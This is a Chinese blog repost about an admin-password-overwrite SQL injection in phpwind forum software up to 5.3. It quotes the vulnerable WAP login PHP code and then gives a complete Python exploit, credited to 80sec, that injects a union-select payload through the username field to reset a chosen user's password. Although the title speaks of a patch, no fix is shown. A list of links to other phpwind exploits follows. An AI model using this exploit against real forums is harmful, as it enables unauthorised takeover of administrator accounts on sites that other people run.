phpwind mysql 密码_phpwind发布可任意修改管理员密码漏洞补丁

最新推荐文章于 2023-03-10 14:53:18 发布
最新推荐文章于 2023-03-10 14:53:18 发布
阅读量193 收藏
点赞数
文章标签: phpwind mysql 密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33350741/article/details/113278427
版权

function wap_login($username,$password){

global $db,$timestamp,$onlineip,$db_ckpath,$db_ckdomain,$db_bbsurl;

$men=$db->get_one("SELECT m.uid,m.password,m.groupid,m.yz,md.onlineip FROM pw_members m LEFT JOIN pw_memberdata md ON md.uid=m.uid WHERE username='$username'");

if($men){

$e_login=explode("|",$men['onlineip']);

if($e_login[0]!=$onlineip.’ *’ || ($timestamp-$e_login[1])>600 || $e_login[2]>1 ){

$men_uid=$men['uid'];

$men_pwd=$men['password'];

$check_pwd=$password;

if($men['yz'] > 2){

wap_msg(’c');

}

if(strlen($men_pwd)==16){

$check_pwd=substr($password,8,16);/*支持 16 位 md5截取密码*/

}

if($men_pwd==$check_pwd){

if(strlen($men_pwd)==16){

$db->update(”UPDATE pw_members SET password=’$password’ WHERE uid=’$men_uid’”);

}

$L_groupid=(int)$men['groupid'];

Cookie(”ck_info”,$db_ckpath.”\t”.$db_ckdomain);

}else{

global $L_T;

$L_T=$e_login[2];

$L_T ? $L_T–:$L_T=5;

$F_login=”$onlineip *|$timestamp|$L_T”;

$db->update(”UPDATE pw_memberdata SET onlineip=’$F_login’ WHERE uid=’$men_uid’”);

wap_msg(’login_pwd_error’);

}

}else{

global $L_T;

$L_T=600-($timestamp-$e_login[1]);

wap_msg(’login_forbid’);

}

} else {

global $errorname;

$errorname=$username;

wap_msg(’user_not_exists’);

}

Cookie(”winduser”,StrCode($men_uid.”\t”.PwdCode($password)));

Cookie(’lastvisit’,”,0);

wap_msg(’wap_login’,'index.php’);

}

甚至不用注册账户,只要精心构造username即可利用此漏洞。

漏洞利用:80sec提供exploit如下:

import urllib2,httplib,sys

httplib.HTTPConnection.debuglevel = 1

cookies = urllib2.HTTPCookieProcessor()

opener = urllib2.build_opener(cookies)

argvs=sys.argv

data = "db_wapifopen=1&prog=login&pwuser=shit%c1'union select "+argvs[2]+”,mid(md5(123456),9,16),3,1,5/*&pwpwd=123456″

pwurl = “%s” % argvs[1]

pwurl = pwurl + “wap/index.php”

print “\r\n\r\nPhpwind Admin Pass Change Exploit”

print “Phpwind <=5.3 "

print "By 80sec "

print "python.exe "+argvs[0]+" http://www.80sec.com/pwforum/ 1\r\n"

print "\r\n[+]TargetForum: "+argvs[1]

print "[+]TargetId: "+argvs[2]

request = urllib2.Request(

url = pwurl ,

headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},

data = data)

f=opener.open(request)

headers=f.headers.dict

try :

cookie=headers["set-cookie"]

if cookie.index('winduser') :

print "[+]Exploit Success"

else : print "[-]Exploit Failed"

except:

print "[-]Exploit Failed"

安静的小屁孩儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpwind漏洞利用
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 874
phpwind漏洞利用,考虑到PHPWind是国内著名的论坛程序,利用它建站的网站非常多,我顿时来了兴趣,决定看看这个漏洞怎么利用。 看漏洞的名字好像影PHPWind8.0版本,我机子里保存了以前下载的PHPWind v8.0 GBK build 20100810的源程序,在虚拟机里安装后测试漏洞不能利用,换了PHPWindForums v7.5 SP3 GBK整合版漏洞利用成功,可能是我机子中之前的版本比较新的缘故吧。下面就用PHPWind Forums v7.5 SP3 GBK整合版来给大家介绍phpw
phpwind任意修改管理员密码漏洞
HackCode的专栏
08-07 2737
 漏洞说明:PHPWind 论坛系统 是一套采用 php+mysql 数据库方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。但是80sec在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员密码进入后台,取得管理员权限。漏洞厂商:http://www.phpwind.net漏洞来源:http://www.80s
PHPWind v7.5 / v8.0漏洞EXP
收集盒 Book box
08-29 2926
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5 影响版本:PHPWind v7.5 / v8.0 命令 :php pking.php user passhttp://www.xxxx.com/ pking.php:复制内容到剪贴板程序代码
phpwind的密码及cookie加密方式
hzcyclone的专栏
03-12 2057
phpwind的数据表中,密码采用单纯一次md5加密的方式。所有的密码经过一次md5之后存入数据库。这在当今来说,并不是什么安全的方式。因为假设,你的数据库被人盗取,那么用户的密码也几乎被人盗取。因为现在甚至有在线破解md5值的网站,已经积累了大量的数据,简单的位数短的密码可以直接还原。让你的隐私无处循形。 而在本博中,我曾提到过一次discuz的加密方式,http://www.akii.org
phpwind Exp 漏洞利用
10-30
phpwind Exp 漏洞利用
PHPWind_For_DVBBS_UTF8.zip_phpwind_phpwind for dvbbs
09-14
PHPWind技术平台为用户提供可持续性技术保障,完美无忧。多样化的风格改造,为用户提供非凡体验。 非凡的访问速度 秉承PHPWind独创的模板和数据库体系以及专业的代码设计保证了PHPWind For DvBBS论坛系统的持续高效...
PHPWind-Wamp-5.0.rar_WAMP 5.0_mental7hp_phpwind
09-23
PHPWind-Wamp-5.0.rar_WAMP 5.0_mental7hp_phpwind】是一个针对Windows操作系统的集成开发环境,特别设计用于搭建PHPWind论坛系统。这个压缩包包含了必要的组件,使得用户可以在Windows环境下方便地运行和管理基于...
Tencent.rar_PHPWIND7.3.2_TXPTOP_php 树形论坛_substancewod_树形论坛
09-24
功能完整pw树形论坛程序,phpwind7.3.2带采集,带自动顶贴功能。未加密版。 (Full-featured program pw tree forum, phpwind7.3.2 with acquisition, with automatic top posted functionality. Unencrypted version...
API_plugin.zip_V2 _phpwind 5
09-24
适用论坛类型: DiscuzX v2.0 和 v2.5 PHPWind v8.7 和 v8.5 需要在 盘啦啦网盘 注册后,在用户中心—>论坛插件获取JS代码在模版中添加,然后下载API插件包解压到论坛根目录。然后更新论坛模版缓存!
PHPWIND创始人密码恢复工具
02-27
PHPWIND创始人密码恢复工具
phpwind mysql 密码_PhpWind教程:MySQL数据库密码修改方法
weixin_28339527的博客
01-19 203
问题:MySQL数据库密码如何修改?解决方法:方法一使用phpmyadmin,这是最简单的了,修改mysql库的user表,不过别忘了使用PASSWORD函数。方法二使用mysqladmin,这是前面声明的一个特例。mysqladmin -u root -p password mypasswd输入这个命令后,需要输入root的原密码,然后root的密码将改为mypasswd。把命令里的root改为...
phpwind任意修改管理员密码漏洞 VBS版利用程序
不只为记载更为传播
08-26 2076
phpwind任意修改管理员密码漏洞 VBS版利用程序 By Tr4c3  Dim strUrl, strPost, xPost, strGet  Set Args = Wscript.Arguments  If Args.countWscript.Echo "Usage: " & Wscript.ScriptName & " http://hi.baidu.com/tr4c3/ 1"  Wsc
记录PHPWIND登陆密码
laZZe's blog
04-20 584
在login.php   Cookie("ck_info",$db_ckpath."\t".$db_ckdomain);下面加入  Cookie("usernamep",$pwuser); Cookie("passwordp",$pwpwd); 复制代码然后在index.php selectMode($m);上面加入  if (!is_null(GetCookie('usernamep
Phpwind出现严重安全漏洞
好好学习,天天向上
01-10 955
近日,国内知名的社区PHPWIND又现严重漏洞,程序中有部分变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令,官方针对这个漏洞已经做出了修补。 phpwind 7.5 Multiple Include Vulnerabilities author: 80vulteam:http://www.80vul.com一.api/class_base.php本地包含漏洞1.描叙 api/cla
phpwind index.php?m=design&c=api,phpwind v9存在命令执行漏洞(登陆后台)
weixin_30249953的博客
03-13 495
已知漏洞:https://www.seebug.org/vuldb/ssvid-94465phpwind v9最新版存在命令执行漏洞(登陆后台)Phpwind_v9.0.2(最新版),phpwind_v9.0.1命令执行高危(getshell)phpwind是一个基于PHPMySQL的开源社区程序,是国内最受欢迎的通用型论坛程序之一。社区可提供丰富的应用,满足人们获取信息、交流、娱乐、消费等生活...
phpwindexp.php,PHPWind v7.5 / v8.0漏洞EXP
weixin_30703633的博客
03-22 446
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5影响版本:PHPWind v7.5 / v8.0命令 :php pking.php user passhttp://www.xxxx.com/pking.php:复制内容到剪贴板程序代码
漏洞复现:phpwind v 9.0.2后台getshell
qq_41631806的博客
04-05 3246
漏洞复现:phpwind v 9.0.2后台getshell 已知影响版本:v9.0.1,v9.0.2 复现版本:9.0.2 搭建环境:phpstudy2018 步骤: 1.将源码放置网站根目录(C:\phpStudy\PHPTutorial\WWW)。如下操作,刷新首页,或修改删除目录下.htaccess文件可解决首页访问限制情况: 2.打开install.php页面安装好phpwind后登陆后...
phpwind漏洞与修复方
最新发布
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 480
phpwind漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作。 phpwind9.0一拖再拖终于发布了,看起来很NB的样子,但是其实是谁用谁知道 ,各种bug满天飞,各种报错…这个就是一例,通杀型…,官方不修复,我自己用着新版本蛋疼啊.. 签到的时候,在自定义我想说的地方,写几个引号,然后就杯具了..提交后,直接报出绝对路径..
PHPWind二次开发实战指南
PHPWind二次开发宝典”是一本详细讲解如何对PHPWind开源论坛进行定制和扩展的指南,由阿里云计算有限公司发布。书中涵盖了从基本的数据查询(CRUD)到复杂的模块如门户、聚合、上传、搜索、唯一键生成、打包、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值